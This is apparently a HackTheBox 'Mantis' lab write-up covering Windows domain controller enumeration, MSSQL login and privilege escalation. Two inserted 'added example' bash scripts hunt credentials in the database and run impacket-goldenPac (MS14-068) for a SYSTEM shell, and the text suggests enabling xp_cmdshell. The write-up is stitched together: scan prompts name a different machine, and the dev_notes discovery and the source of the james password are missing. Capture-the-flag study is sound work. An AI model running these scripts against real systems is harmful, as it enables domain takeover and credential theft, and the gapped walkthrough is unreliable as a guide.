Mantis can definitely be one of the more challenging machines for some users. For successful exploitation, a fair bit of knowledge or research of Windows Servers and the domain controller system is required.
Enumeration
Scope
IP Address: 10.10.10.52
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
1337/tcp open waste
1433/tcp open ms-sql-s
8080/tcp open http-proxy
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p53,88,139,389,445,1433,8080 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-13 04:21:49Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
PORT STATE SERVICE VERSION
1337/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
|_ssl-date: 2024-07-13T04:22:12+00:00; +4s from scanner time.
| ms-sql-ntlm-info:
| 10.10.10.52:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-07-13T04:14:57
| Not valid after: 2054-07-13T04:14:57
| MD5: 5cef:fbd5:1743:b5a4:ac1d:4a7a:92eb:e950
|_SHA-1: 8a80:3d0c:f5f9:f67c:e526:9d2a:d5b9:f582:b093:685c
| ms-sql-info:
| 10.10.10.52:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-07-13T04:22:04
|_ start_date: 2024-07-13T04:14:30
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2024-07-13T00:22:05-04:00
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: mean: 48m05s, deviation: 1h47m22s, median: 3s
* Open ports (TCP): 53, 88, 135, 139, 389, 445, 1337, 1433, 8080, plus the RPC endpoint-mapper range 49152-49157
* Open ports (UDP): 53, 88, 123, 389
* Services: DNS - Kerberos - RPC - SMB - LDAP - MSSQL - HTTP (IIS 7.5 on 1337, a blog on 8080)
* Versions: Windows Server 2008 R2 SP1 - IIS 7.5 - Microsoft SQL Server 2014 RTM (no post-RTM patches)
* Important notes: FQDN mantis.htb.local, domain htb.local. DNS, Kerberos and LDAP on one host means this is the domain controller. SMB signing is required, so NTLM relay to this box is out. Clock skew to the DC is only +4s, so Kerberos-based tooling will work without time sync for now.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
SMB Enumeration
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ smbclient -N -L //$ip
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.52 445 MANTIS [+] htb.local\:
SMB 10.10.10.52 445 MANTIS [-] Error enumerating shares: STATUS_ACCESS_DENIED
I decoded the odd-looking string in the dev_notes file. The output looked like it might be a hash, but hashid did not recognise it as any known hash type, so it is more likely a plaintext password.
I did not have a username list yet to test that password with, and kerbrute found no valid users with the jsmith.txt wordlist, so I tried a bigger list.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ crackmapexec smb $ip -u users.lst -p 'm$$ql_S@_P@ssW0rd!'
SMB 10.10.10.52 445 MANTIS [-] htb.local\James:m$$ql_S@_P@ssW0rd! STATUS_LOGON_FAILURE
SMB 10.10.10.52 445 MANTIS [-] htb.local\Administrator:m$$ql_S@_P@ssW0rd! STATUS_LOGON_FAILURE
SMB 10.10.10.52 445 MANTIS [-] htb.local\mantis:m$$ql_S@_P@ssW0rd! STATUS_LOGON_FAILURE
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ crackmapexec mssql $ip -u users.lst -p 'm$$ql_S@_P@ssW0rd!'
MSSQL 10.10.10.52 1433 MANTIS [-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
MSSQL 10.10.10.52 1433 MANTIS [-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
MSSQL 10.10.10.52 1433 MANTIS [-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
The notes also say the MSSQL username is admin and the database is orcharddb. That is a SQL Server login, not a domain account, which explains the "untrusted domain" error above: crackmapexec mssql uses Windows (NTLM) authentication by default and needs --local-auth for SQL logins, while impacket-mssqlclient does SQL Server authentication unless -windows-auth is passed.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ impacket-mssqlclient htb.local/admin:'m$$ql_S@_P@ssW0rd!'@$ip -db orcharddb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: orcharddb
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'orcharddb'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)
[!] Press help for extra shell commands
SQL (admin admin@orcharddb)>
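The writeup does not show what was done inside the SQL shell, so the following is an added example (not the author's commands) of a first pass over orcharddb with the admin SQL login from the notes: check what the login can do server-wide, list the tables, and look for columns that smell like credentials, then dump only the tables that search points at. It drives impacket-mssqlclient with its -file option so each pass is repeatable. The host, login and database are from the page; the output file name, the column-name patterns, and the dbo.Users table in the usage comment are this example's assumptions.

```shell
#!/usr/bin/env bash
# Added example, not part of the original writeup.
# Recon of a SQL Server database through a SQL (non-Windows) login.
TARGET="${TARGET:-10.10.10.52}"
DB="${DB:-orcharddb}"
SQL_USER="${SQL_USER:-admin}"
SQL_PASS='m$$ql_S@_P@ssW0rd!'        # password decoded from dev_notes (from the page)
OUT="${OUT:-orcharddb-enum.sql}"     # assumed file name for the query batch

# Quote a schema/table pair the T-SQL way so odd table names survive.
bracket() { printf '[%s].[%s]' "$1" "$2"; }

# A bounded dump of one table; TOP n keeps a large table from flooding the shell.
dump_query() {  # $1=schema $2=table $3=row limit
    printf 'SELECT TOP %d * FROM %s;\n' "$3" "$(bracket "$1" "$2")"
}

# Recon batch: privileges of the login, dangerous server options, the table
# list, and any column whose name suggests stored credentials.
recon_queries() {
    cat <<'EOF'
SELECT SYSTEM_USER AS current_login, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
SELECT name, value_in_use FROM sys.configurations WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures');
SELECT TABLE_SCHEMA, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' ORDER BY TABLE_NAME;
SELECT TABLE_NAME, COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE COLUMN_NAME LIKE '%pass%' OR COLUMN_NAME LIKE '%pwd%' OR COLUMN_NAME LIKE '%hash%' OR COLUMN_NAME LIKE '%salt%' ORDER BY TABLE_NAME, COLUMN_NAME;
EOF
}

# Without -windows-auth, mssqlclient authenticates as a SQL login, which is
# what this account is (the NTLM attempt earlier failed with "untrusted domain").
run_sql_file() {
    impacket-mssqlclient "${SQL_USER}:${SQL_PASS}@${TARGET}" -db "$DB" -file "$OUT"
}

run_recon() {
    recon_queries > "$OUT"
    run_sql_file
}

# Second pass: dump the tables the column search pointed at, e.g. dbo.Users.
dump_tables() {  # args: schema.table ...
    local t
    for t in "$@"; do dump_query "${t%%.*}" "${t#*.}" 50; done > "$OUT"
    run_sql_file
}

# usage: ./orchard-enum.sh recon
#        ./orchard-enum.sh dump dbo.Users
case "${1:-}" in
    recon) run_recon ;;
    dump)  shift; dump_tables "$@" ;;
esac
```

Run the recon pass first; if IS_SRVROLEMEMBER returns 1 the login is sysadmin and enabling xp_cmdshell is the faster route to code execution than hunting for reused passwords, otherwise the column search tells you which tables to dump.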
I run bloodhound-python as james to collect the domain and feed its JSON output into the BloodHound GUI.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ bloodhound-python -u 'james' -p 'J@m3s_P@ssW0rd!' -ns $ip -d htb.local -c all
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ zip mantis.zip *.json
BloodHound shows a CanRDP edge from james to the machine, but when I checked the RDP port it was closed.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ nmap -p3389 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-13 01:35 EDT
Nmap scan report for 10.10.10.52
Host is up (0.067s latency).
PORT STATE SERVICE
3389/tcp closed ms-wbt-server
Privilege Escalation
I could not get any further on my own, so I took a hint from the community: the DC is vulnerable to MS14-068 (CVE-2014-6324), a Kerberos PAC signature-validation flaw that lets any authenticated domain user forge a ticket carrying Domain Admin group membership without being an admin.
Useful post to configure our kali to work properly:
POC for the vulnerability:
I followed the post above to get SYSTEM, but it did not work for me: it is an old vulnerability and I could not get the Python script to run, so I took the unintended path and used the noPac exploit (CVE-2021-42278 / CVE-2021-42287, sAMAccountName spoofing) to get a SYSTEM shell.
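The two things that most often break MS14-068 from a Kali box are Kerberos clock skew (the DC rejects tickets more than 5 minutes off) and name resolution (the exploit wants the DC's FQDN, which the lab DNS will not give you unless you point at it). Here is an added example, not the author's steps, that checks both before running impacket's own MS14-068 implementation, impacket-goldenPac, which forges the PAC, obtains a ticket with it and runs psexec against the target. The DC address, host names and the james credentials are from the page; the assumption that ntpdate is installed (NTP/123 was open in the UDP scan) and the exact ntpdate output format are this example's.

```shell
#!/usr/bin/env bash
# Added example, not part of the original writeup.
DC_IP="${DC_IP:-10.10.10.52}"
DC_FQDN="mantis.htb.local"
DOMAIN="htb.local"
KUSER="james"
KPASS='J@m3s_P@ssW0rd!'

# Pull the "offset N" field out of an `ntpdate -q` line such as
# "server 10.10.10.52, stratum 1, offset -0.001234, delay 0.02567".
parse_ntp_offset() {  # $1 = one line of ntpdate -q output; prints seconds
    printf '%s\n' "$1" | sed -n 's/.*offset[ ]*\(-\{0,1\}[0-9.]*\).*/\1/p' | head -n1
}

# Kerberos tolerates 5 minutes of skew by default; compare |offset| to 300 s.
skew_ok() {  # $1 = offset in seconds, may be negative or fractional
    local abs=${1#-}
    abs=${abs%%.*}
    [ "${abs:-0}" -le 300 ]
}

# One /etc/hosts line so the FQDN, short name and domain all resolve to the DC.
hosts_entry() {  # $1 = DC address
    printf '%s %s %s %s\n' "$1" "$DC_FQDN" "${DC_FQDN%%.*}" "$DOMAIN"
}

sync_clock() {
    local line off
    line=$(ntpdate -q "$DC_IP" | head -n1)   # assumes ntpdate is installed
    off=$(parse_ntp_offset "$line")
    if skew_ok "$off"; then
        echo "[*] clock skew ${off}s, within Kerberos tolerance"
    else
        echo "[!] clock skew ${off}s, syncing to the DC"
        sudo ntpdate "$DC_IP"
    fi
}

ensure_hosts() {
    grep -q "$DC_FQDN" /etc/hosts || hosts_entry "$DC_IP" | sudo tee -a /etc/hosts >/dev/null
}

exploit() {
    # impacket's MS14-068 (CVE-2014-6324) exploit: forges a PAC claiming Domain
    # Admin membership, gets a ticket with it and psexecs to the target as SYSTEM.
    impacket-goldenPac "${DOMAIN}/${KUSER}:${KPASS}@${DC_FQDN}" -dc-ip "$DC_IP"
}

main() { sync_clock; ensure_hosts; exploit; }

# usage: ./ms14-068.sh run
if [ "${1:-}" = "run" ]; then main; fi
```

If goldenPac still fails after the clock and hosts checks, the DC may simply be patched for MS14-068, in which case the sAMAccountName spoofing route (noPac) the author fell back on is the next thing to try with the same credentials.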